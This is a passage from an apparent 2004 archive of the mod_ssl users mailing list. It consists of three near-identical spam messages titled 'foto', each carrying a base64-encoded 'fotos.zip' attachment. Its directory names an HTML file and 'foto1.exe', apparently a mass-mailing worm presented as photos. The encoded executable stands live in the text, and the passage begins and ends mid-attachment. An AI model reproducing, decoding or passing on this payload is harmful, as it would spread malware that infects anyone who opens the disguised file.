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
AA==

----------epspdpotiwzaididjzpo--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 23:20:17 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0B792A8A95; Tue, 31 Aug 2004 23:20:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from System7.com (gw-simmonds.dsl.primus.ca [216.254.186.62])
	by master.modssl.org (Postfix) with SMTP id 1C061A8A7D
	for ; Tue, 31 Aug 2004 23:20:11 +0200 (CEST)
Date: Tue, 31 Aug 2004 17:20:13 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------zlehanhjjmtgwxiymqvo"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------zlehanhjjmtgwxiymqvo
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------zlehanhjjmtgwxiymqvo
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
AA==

----------zlehanhjjmtgwxiymqvo--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 00:17:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 412C0A8943; Wed,  1 Sep 2004 00:17:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lab12.net (host238.155.212.212.conversent.net [155.212.212.238])
	by master.modssl.org (Postfix) with SMTP id 4FCB6A8934
	for ; Wed,  1 Sep 2004 00:17:18 +0200 (CEST)
Date: Tue, 31 Aug 2004 18:17:08 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------difuhqhqxwfibdcyvhgm"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------difuhqhqxwfibdcyvhgm
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------difuhqhqxwfibdcyvhgm
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
